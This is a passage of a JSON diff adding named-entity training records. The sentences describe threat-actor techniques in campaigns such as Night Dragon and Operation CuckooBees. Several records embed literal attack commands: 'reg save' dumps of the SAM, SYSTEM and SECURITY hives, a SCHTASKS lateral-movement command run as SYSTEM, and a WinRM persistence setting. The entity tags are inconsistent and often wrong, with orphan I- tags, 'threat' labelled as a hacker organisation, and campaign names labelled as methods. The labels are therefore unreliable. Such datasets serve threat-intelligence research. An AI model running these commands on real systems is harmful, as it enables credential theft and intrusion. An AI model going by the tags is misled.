"O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "HTTP", + "GET", + "requests", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "ran", + "a", + "command", + "script", + "to", + "set", + "up", + "persistence", + "as", + "a", + "scheduled", + "task", + "named", + "\"WinUpdate\",", + "as", + "well", + "as", + "other", + "encoded", + "commands", + "from", + "the", + "command-line" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "WMI", + "queries", + "to", + "check", + "if", + "various", + "security", + "applications", + "were", + "running", + "as", + "well", + "as", + "to", + "determine", + "the", + "operating", + "system", + "version." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "FunnyDream,", + "the", + "threat", + "actors", + "used", + "7zr.exe", + "to", + "add", + "collected", + "files", + "to", + "an", + "archive." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "FunnyDream,", + "the", + "threat", + "actors", + "registered", + "a", + "variety", + "of", + "domains." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "FunnyDream,", + "the", + "threat", + "actors", + "likely", + "established", + "an", + "identified", + "email", + "account", + "to", + "register", + "a", + "variety", + "of", + "domains", + "that", + "were", + "used", + "during", + "the", + "campaign." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "During", + "FunnyDream,", + "the", + "threat", + "actors", + "downloaded", + "additional", + "droppers", + "and", + "backdoors", + "onto", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "FunnyDream,", + "the", + "threat", + "actors", + "used", + "a", + "new", + "backdoor", + "named", + "FunnyDream." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "FunnyDream,", + "the", + "threat", + "actors", + "used", + "Tasklist", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "FunnyDream,", + "the", + "threat", + "actors", + "used", + "several", + "tools", + "and", + "batch", + "files", + "to", + "map", + "victims'", + "internal", + "networks." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "FunnyDream,", + "the", + "threat", + "actors", + "used", + "Systeminfo", + "to", + "collect", + "information", + "on", + "targeted", + "hosts." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "FunnyDream,", + "the", + "threat", + "actors", + "used", + "ipconfig", + "for", + "discovery", + "on", + "remote", + "systems." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "FunnyDream,", + "the", + "threat", + "actors", + "used", + "netstat", + "to", + "discover", + "network", + "connections", + "on", + "remote", + "systems." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "FunnyDream,", + "the", + "threat", + "actors", + "used", + "a", + "modified", + "version", + "of", + "the", + "open", + "source", + "PcShare", + "remote", + "administration", + "tool." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "FunnyDream,", + "the", + "threat", + "actors", + "used", + "a", + "Visual", + "Basic", + "script", + "to", + "run", + "remote", + "commands." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "FunnyDream,", + "the", + "threat", + "actors", + "used", + "`cmd.exe`", + "to", + "execute", + "the", + "wmiexec.vbs", + "script." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "During", + "FunnyDream,", + "the", + "threat", + "actors", + "used", + "`wmiexec.vbs`", + "to", + "run", + "remote", + "commands." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "the", + "threat", + "actors", + "collected", + "files", + "and", + "other", + "data", + "from", + "compromised", + "systems." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "disabled", + "anti-virus", + "and", + "anti-spyware", + "tools", + "in", + "some", + "instances", + "on", + "the", + "victim’s", + "machines.", + "The", + "actors", + "also", + "disabled", + "proxy", + "settings", + "to", + "allow", + "direct", + "communication", + "from", + "victims", + "to", + "the", + "Internet." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "domain", + "accounts", + "to", + "gain", + "further", + "access", + "to", + "victim", + "systems." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "dynamic", + "DNS", + "services", + "for", + "C2." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "a", + "DLL", + "that", + "included", + "an", + "XOR-encoded", + "section." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "SQL", + "injection", + "exploits", + "against", + "extranet", + "web", + "servers", + "to", + "gain", + "access." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "compromised", + "VPN", + "accounts", + "to", + "gain", + "access", + "to", + "victim", + "systems." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "I-Tool", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "company", + "extranet", + "servers", + "as", + "secondary", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "zwShell", + "to", + "establish", + "full", + "remote", + "control", + "of", + "the", + "connected", + "machine", + "and", + "browse", + "the", + "victim", + "file", + "system." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "administrative", + "utilities", + "to", + "deliver", + "Trojan", + "components", + "to", + "remote", + "systems." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "RAT", + "malware", + "to", + "exfiltrate", + "email", + "archives." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "enticed", + "users", + "to", + "click", + "on", + "links", + "in", + "spearphishing", + "emails", + "to", + "download", + "malware." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "Trojans", + "from", + "underground", + "hacker", + "websites." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "zwShell", + "to", + "establish", + "full", + "remote", + "control", + "of", + "the", + "connected", + "machine", + "and", + "manipulate", + "the", + "Registry." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "pass-the-hash", + "tools", + "to", + "obtain", + "authenticated", + "access", + "to", + "sensitive", + "internal", + "desktops", + "and", + "servers." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "Cain", + "&", + "Abel", + "to", + "crack", + "password", + "hashes." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "several", + "remote", + "administration", + "tools", + "as", + "persistent", + "infiltration", + "channels." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "copied", + "files", + "to", + "company", + "web", + "servers", + "and", + "subsequently", + "downloaded", + "them." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "dumped", + "account", + "hashes", + "using", + "gsecdump." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "purchased", + "hosted", + "services", + "to", + "use", + "for", + "C2." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "compromised", + "web", + "servers", + "to", + "use", + "for", + "C2." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "software", + "packing", + "in", + "its", + "tools." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "sent", + "spearphishing", + "emails", + "containing", + "links", + "to", + "compromised", + "websites", + "where", + "malware", + "was", + "downloaded." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "password", + "cracking", + "and", + "pass-the-hash", + "tools", + "to", + "discover", + "usernames", + "and", + "passwords." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "gsecdump." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "uploaded", + "commonly", + "available", + "hacker", + "tools", + "to", + "compromised", + "web", + "servers." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "compromised", + "VPN", + "accounts", + "to", + "gain", + "access", + "to", + "victim", + "systems." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "I-Tool", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Night", + "Dragon,", + "threat", + "actors", + "used", + "zwShell", + "to", + "establish", + "full", + "remote", + "control", + "of", + "the", + "connected", + "machine", + "and", + "run", + "command-line", + "shells." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "Makecab", + "utility", + "to", + "compress", + "and", + "a", + "version", + "of", + "WinRAR", + "to", + "create", + "password-protected", + "archives", + "of", + "stolen", + "data", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "executed", + "an", + "encoded", + "VBScript", + "file." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "legitimate", + "Windows", + "services", + "`IKEEXT`", + "and", + "`PrintNotify`", + "to", + "side-load", + "malicious", + "DLLs." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "collected", + "data,", + "files,", + "and", + "other", + "information", + "from", + "compromised", + "networks." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`dsquery`", + "and", + "`dsget`", + "commands", + "to", + "get", + "domain", + "environment", + "information", + "and", + "to", + "query", + "users", + "in", + "administrative", + "groups." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "compromised", + "domain", + "administrator", + "credentials", + "as", + "part", + "of", + "their", + "lateral", + "movement." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "exploited", + "multiple", + "vulnerabilities", + "in", + "externally", + "facing", + "servers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "enabled", + "WinRM", + "over", + "HTTP/HTTPS", + "as", + "a", + "backup", + "persistence", + "mechanism", + "using", + "the", + "following", + "command:", + "`cscript", + "//nologo", + "\"C:\\Windows\\System32\\winrm.vbs\"", + "set", + "winrm/config/service@{EnableCompatibilityHttpsListener=\"true\"}`." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "`dir", + "c:\\\\`", + "to", + "search", + "for", + "files." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "stroed", + "payloads", + "in", + "Windows", + "CLFS", + "(Common", + "Log", + "File", + "System)", + "transactional", + "logs." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "attackers", + "used", + "a", + "signed", + "kernel", + "rootkit", + "to", + "establish", + "additional", + "persistence." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`net", + "user`", + "command", + "to", + "gather", + "account", + "information." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`net", + "group`", + "command", + "as", + "part", + "of", + "their", + "advanced", + "reconnaissance." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "renamed", + "a", + "malicious", + "executable", + "to", + "`rundll32.exe`", + "to", + "allow", + "it", + "to", + "blend", + "in", + "with", + "other", + "Windows", + "system", + "files." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`net", + "share`", + "command", + "as", + "part", + "of", + "their", + "advanced", + "reconnaissance." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`net", + "accounts`", + "command", + "as", + "part", + "of", + "their", + "advanced", + "reconnaissance." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`fsutil", + "fsinfo", + "drives`", + "command", + "as", + "part", + "of", + "their", + "advanced", + "reconnaissance." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`tasklist`", + "command", + "as", + "part", + "of", + "their", + "advanced", + "reconnaissance." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`net", + "view`", + "and", + "`ping`", + "commands", + "as", + "part", + "of", + "their", + "advanced", + "reconnaissance." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "scheduled", + "tasks", + "to", + "execute", + "batch", + "scripts", + "for", + "lateral", + "movement", + "with", + "the", + "following", + "command:", + "`SCHTASKS", + "/Create", + "/S", + "<IP", + "Address>", + "/U", + "<Username>", + "/p", + "<Password>", + "/SC", + "ONCE", + "/TN", + "test", + "/TR", + "<Path", + "to", + "a", + "Batch", + "File>", + "/ST", + "<Time>", + "/RU", + "SYSTEM.`" + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "leveraged", + "a", + "custom", + "tool", + "to", + "dump", + "OS", + "credentials", + "and", + "used", + "following", + "commands:", + "`reg", + "save", + "HKLM\\\\SYSTEM", + "system.hiv`,", + "`reg", + "save", + "HKLM\\\\SAM", + "sam.hiv`,", + "and", + "`reg", + "save", + "HKLM\\\\SECURITY", + "security.hiv`,", + "to", + "dump", + "SAM,", + "SYSTEM", + "and", + "SECURITY", + "hives." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`systeminfo`", + "command", + "to", + "gather", + "details", + "about", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "`ipconfig`,", + "`nbtstat`,", + "`tracert`,", + "`route", + "print`,", + "and", + "`cat", + "/etc/hosts`", + "commands." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`net", + "session`,", + "`net", + "use`,", + "and", + "`netstat`", + "commands", + "as", + "part", + "of", + "their", + "advanced", + "reconnaissance." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`query", + "user`", + "and", + "`whoami`", + "commands", + "as", + "part", + "of", + "their", + "advanced", + "reconnaissance." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`net", + "start`", + "command", + "as", + "part", + "of", + "their", + "initial", + "reconnaissance." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "the", + "`net", + "time`", + "command", + "as", + "part", + "of", + "their", + "advanced", + "reconnaissance." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "obtained", + "publicly-available", + "JSP", + "code", + "that", + "was", + "used", + "to", + "deploy", + "a", + "webshell", + "onto", + "a", + "compromised", + "server." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "executed", + "an", + "encoded", + "VBScript", + "file", + "using", + "`wscript`", + "and", + "wrote", + "the", + "decoded", + "output", + "to", + "a", + "text", + "file." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "enabled", + "HTTP", + "and", + "HTTPS", + "listeners." + 